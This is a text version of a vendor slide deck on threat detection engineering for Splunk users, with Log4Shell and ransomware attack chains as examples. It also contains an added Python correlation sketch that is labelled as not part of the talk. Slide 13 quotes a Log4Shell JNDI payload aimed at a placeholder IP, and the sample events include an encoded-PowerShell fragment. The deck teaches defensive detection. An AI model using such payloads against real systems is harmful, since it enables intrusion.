SF Bay Area Splunk User Group Meeting October 5, 2022
1. ANVILOGIC Inc. CONFIDENTIAL
Modernizing Threat Detection Engineering
San Francisco Bay Area Splunk User Group
Virtual Meeting, October 5, 2022
2. Andrew D'Auria - whoami?
● Director of Sales Engineering at Anvilogic
● Software industry since 1996
● CISSP since 2015
● Splunk, McAfee, Surfcontrol, NetForensics, RSA, and others
● Managing, coaching, and hiring Sales Engineers since 2018
● Native of NYC, living in Wake Forest, NC (Raleigh) since 2007
● Married to Ilissa for 24 years, with 2 daughters, Jessica (17) and Julie (14)
● Will play anything with frets, but especially electric guitar, since 1988
● Love to hike, grill, eat, drink, smoke a pipe/cigar, draw, paint
3. Core Security Operations Functions
Data Science Insights & Models (Cloud Only)
● Detection Eng.: Mature/Maintain
● Accelerated Detection Insights, Improve
● Purple Team / Threat Research
● Hunt: Become Proactive
● Triage: Smarter, Faster Analysis
● Respond: Automate Response
4. Detection Engineering - The Current Way
1. Manual Research (ex. Google, Github): Identify Threat Research, 48 hr
2. Track / Feedback (ex. JIRA): Create Ticket, 1 hr
3. Develop, Test, Deploy (ex. SIEM): Build, Test, Deploy, 20 hr
4. Document Use Case (ex. Confluence): Runbook, 3 hr
5. Metrics & Reporting (ex. Qlikview): Maintain/Tune KPIs
Disjoint People, Process, Technology from Start to End: 3-5 Days Each, 2-3+ Teams, 5+ Tools
x 3 Times = +15D for a Log4Shell Attack (3 Use Cases: exploit, .exe, C2)
5. What are the problems with detection engineering today?
1. Detection engineering is
● slow
● difficult
● results in noisy false positives delivered to the SOC
2. Bringing all data into a centralized SIEM data store is
● expensive
● difficult, especially in hybrid cloud environments
3. There is no good way to
● track MITRE ATT&CK technique coverage
● measure maturity progress in real time
● identify gaps and measure risk
6. How can we measure the effectiveness of our DE program?
Collection
• Data Coverage
• Data Quality
• Data Availability
Detection
• Detection Coverage
• Detection Quality
• Lifecycle Management
Response
• Alert Management
• Workflow
• Speed
• Accuracy
Maturity questions (Operational Maturity and Strategic Maturity):
• How Are We Performing?
• How Can We Perform Better?
• Where Can We Perform Better?
• Organizational Risk?
• Industry-Specific Risk?
• Technology-Specific Risk?
• Communicating Value?
7. Typical vs. Ideal Detection → Pyramid of Pain
Typical
• IOC Driven
• Very time limited
• Lack of Context
• Whack-a-mole
Ideal
• Tool & Behavior Driven
• Very hard for adversaries to change
• Long term strategic value for detections
Image Source: David Bianco's blog - http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html
8. Content 2.0
Events → Events of Interest → Alerts
Traditional Alerts vs. Threat Scenarios and Risk Thresholds
9. Threat Identifiers and Threat Scenarios
Threat Identifier:
Event ID = "1234" AND (Process Name = "XYZ" OR Process Name = "ABC")
Events of Interest, correlated on the same Entity 'X' (Entity 'X' + Entity 'X' + Entity 'X') into a Threat Scenario:
Event of Interest "A" AND (60 Minutes) Event of Interest "B" AND (5 hours) Event of Interest "C"
10. Hunting Index - AKA: Events of Interest
● Correlating TTPs or Events of Interest
11. Modern Security Operations
Detection Engineering, Alerting, Triage, Hunting, and Response Across Modern Hybrid Data Environments
Security & IT Products (ex. EDR, AV, Cloud) → Logs → Logging Platforms (ex. Splunk, Snowflake, Azure)
Platform: Query & Import (API), Query (API), Pull (API), Store Identifiers (EOIs)
Tag, Normalize, Enrich → Hunt & Correlate → Case/Ticketing & SOAR
Analyst Activity: Triage Threat Scenarios, Auto-Threat Detection, No Code - Build Rules, Detection Recommendations
13. Example: Log4Shell Attack Pattern
Attacker → Victim → Security Operations Center → Response
1. {$jndi:ldap://1.2.3.4/Exploit} (Initial Access)
2. java.exe <Payload Class> (Execution)
3. Establish C2 (C2)
Detection Engineers: Research, Test, Document, Deploy, 3-5 Days; 1000s alerts (Alert 1, Alert 2, Alert 3) go to SOC Triage
Build MITRE Attack Detections: 1 + 2 + 3 (Initial Access, Execution, C2). Easy Correlation - No Code Required!
Workspace & Tasks: Track, Tune, Versions, Test, Deploy, Improve, Mature, Maintain
Threat Research: Research, Exploit in Lab, Develop, Test, Share
Attack Scenario: 1 + 2 + 3. Reduce Alert Volume, Improve Dwell Time. Triage Under 2 Hours
Anvilogic Platform for Threat Detection, Investigation, and Response (TDIR)
14. Example: Ransomware Attack Pattern
Stage 1: Initial Access - Windows Macro Execution (Word Doc): An employee opens a malicious attachment that runs a macro
Stage 2: Installation - Encoded PowerShell Command (+30s): Macro spawns an encoded command in PowerShell
Stage 3: Command & Control - Cobalt Strike Abnormal Web Connection (+60m): Machine makes abnormal web connection to malware payload domain and establishes persistence
Last Chance to Detect!
Stage 4: Discovery - AD Find Execution (+60m, Batch File </>): Attacker uses adfind to gather active directory information for internal reconnaissance
4 Rules + 1 Correlation = How Long?
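As an added example (not code from the presentation or from Anvilogic), the Threat Identifier / Threat Scenario structure of slide 9 applied to the four-stage ransomware chain above: each identifier is a boolean predicate over normalized event fields, and the scenario correlator walks one host's events of interest in time order under the +30s / +60m / +60m windows, so a lone adfind or a macro with no follow-on never becomes an alert. Field names, host names and the sample events are constructed for this example.

```python
from datetime import datetime, timedelta

# Threat identifiers: one boolean-over-fields predicate per event of interest
# (EOI), the same shape as slide 9's "Event ID AND (Process OR Process)".
IDENTIFIERS = {
    "macro_exec": lambda e: e.get("parent") == "winword.exe" and e.get("image") in ("cmd.exe", "powershell.exe"),
    "encoded_ps": lambda e: e.get("image") == "powershell.exe" and "-enc" in e.get("cmdline", "").lower(),
    "abnormal_web": lambda e: e.get("dest") is not None and not e.get("dest_seen_before"),
    "adfind": lambda e: e.get("image") == "adfind.exe",
}

# Threat scenario (slide 14): ordered EOIs, each with the longest gap allowed
# since the previous stage. None = no time constraint on the first stage.
RANSOMWARE = [("macro_exec", None), ("encoded_ps", timedelta(seconds=30)),
              ("abnormal_web", timedelta(minutes=60)), ("adfind", timedelta(minutes=60))]

def tag_events(events):
    """Run every identifier over every event; return (host, ts, eoi) tuples."""
    return [(e["host"], e["ts"], name) for e in events
            for name, match in IDENTIFIERS.items() if match(e)]

def correlate(eois, scenario):
    """Per host, walk EOIs in time order; return the highest stage reached.
    Only a host that reaches len(scenario) should become an alert."""
    by_host = {}
    for host, ts, name in sorted(eois, key=lambda t: t[1]):
        by_host.setdefault(host, []).append((ts, name))
    progress = {}
    for host, seq in by_host.items():
        stage, last_ts = 0, None
        for ts, name in seq:
            if stage == len(scenario):
                break
            want, max_gap = scenario[stage]
            if name == want and (max_gap is None or ts - last_ts <= max_gap):
                stage, last_ts = stage + 1, ts
        progress[host] = stage
    return progress

T = datetime(2022, 10, 5, 9, 0)  # constructed sample telemetry for three hosts
SAMPLE_EVENTS = [
    {"host": "wks-17", "ts": T, "parent": "winword.exe", "image": "cmd.exe"},
    {"host": "wks-17", "ts": T + timedelta(seconds=10), "parent": "cmd.exe",
     "image": "powershell.exe", "cmdline": "powershell -nop -w hidden -enc SQBFAFgA"},
    {"host": "wks-17", "ts": T + timedelta(minutes=35), "image": "powershell.exe",
     "dest": "cdn-update.invalid", "dest_seen_before": False},
    {"host": "wks-17", "ts": T + timedelta(minutes=80), "image": "adfind.exe"},
    {"host": "wks-22", "ts": T, "parent": "winword.exe", "image": "cmd.exe"},
    {"host": "wks-22", "ts": T + timedelta(minutes=3), "parent": "cmd.exe",
     "image": "powershell.exe", "cmdline": "powershell -enc SQBFAFgA"},  # outside +30s
    {"host": "dc-admin", "ts": T, "image": "adfind.exe"},  # lone adfind by an admin
]
```

`correlate(tag_events(SAMPLE_EVENTS), RANSOMWARE)` gives `{'wks-17': 4, 'wks-22': 1, 'dc-admin': 0}`: only wks-17 completes the chain, while the admin's single adfind (which a standalone rule would alert on) and the macro whose PowerShell arrived outside the 30-second window stay as events of interest for hunting.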
15. Anvilogic Impacts - 50B Financial Services
Anvilogic Framework Impacts (60 Days)
● +180 EDR Rules (Linux & Windows)
● 111 Cloud, 97 Endpoint, 31 Web, +403 Custom
● 55 Azure Rules, Improved by +31%
● 20 AWS Rules, Improved by +75%
● 12 GCP Rules, Improved by +17%
● 24 O365 Rules, Improved by +21%
● 12 Proxy Rules, Improved by +30%
● 19 Web App Rules, Improved by +40%
● 55 Windows Rules, Improved by +55%
● 42 Linux Rules, Improved by +90%
● 51 Scenarios, 239 Identifiers, 17 Macros
● 8.1T Raw Events, 4,000+ Sourcetypes, 8.14M Warnings, 300+ Identifiers, 10+ Scenarios, 351 Alerts, 5.8 Alerts per day
● Use Cases: 454 Deployed; Uploads, Downloads: ~2m
● Increased Overall Detections by 91%
● Saved up to 6,500+ hours of engineering time
16. Key Takeaways & Next Steps
● Effective detection engineering requires good data, process, and measurement
● Not every detection requires an alert or action
● Build effective detections based on real-world attack scenarios and risk thresholds
● Pyramid of pain whitepaper: https://www.anvilogic.com/learn/whitepaper-pyramid-apex
● Subscribe to our Threat Report: anvilogic.com/resources/threat-report